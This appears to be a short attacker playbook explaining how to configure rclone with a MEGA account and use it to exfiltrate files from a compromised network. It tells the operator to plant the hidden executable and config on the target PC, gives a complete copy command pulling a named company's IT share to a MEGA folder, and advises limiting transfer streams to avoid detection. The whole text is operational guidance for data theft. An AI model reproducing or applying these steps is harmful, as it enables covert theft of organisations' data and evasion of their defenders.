Rclone
In order to start downloading through the rclone you need to create a config
To create a config you need to open cmd and go to the directory where rclone.exe is located
Run rclone.exe with the command : rclone config
then select "new remote" in the menu that appears
call it "mega" then enter mega again 
then enter the mega e-mail address, after it will ask you to enter your password or generate it, we choose ours with the letter 'Y'. 
the pass will not appear on insertion, but it is still inserted there
After creating a config, we are thrown back to the main menu and we will exit the rclone.
Then enter this command "rclone.exe config show" it will show the config that we created
we copy it and create a file rclone.conf where we should put this information.
After we have found network shares we are interested in, we upload exe and the config to the target PC with the rights to hide the config and exe so that they are not found
go to the directory, where exe is located and run the command: shell rclone.exe copy "\\envisionpharma.com\IT\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
where: \\envisionpharma.com\IT\KLSHARE is share 
Mega:Finanse file location in the mega (can create a folder in the mega on its own, it is only necessary to specify folder name here)
streams 12 --transfers 12 this is the number of simultaneous upload streams at maximum (12) I do not recommend to use many because you can easily get caught 
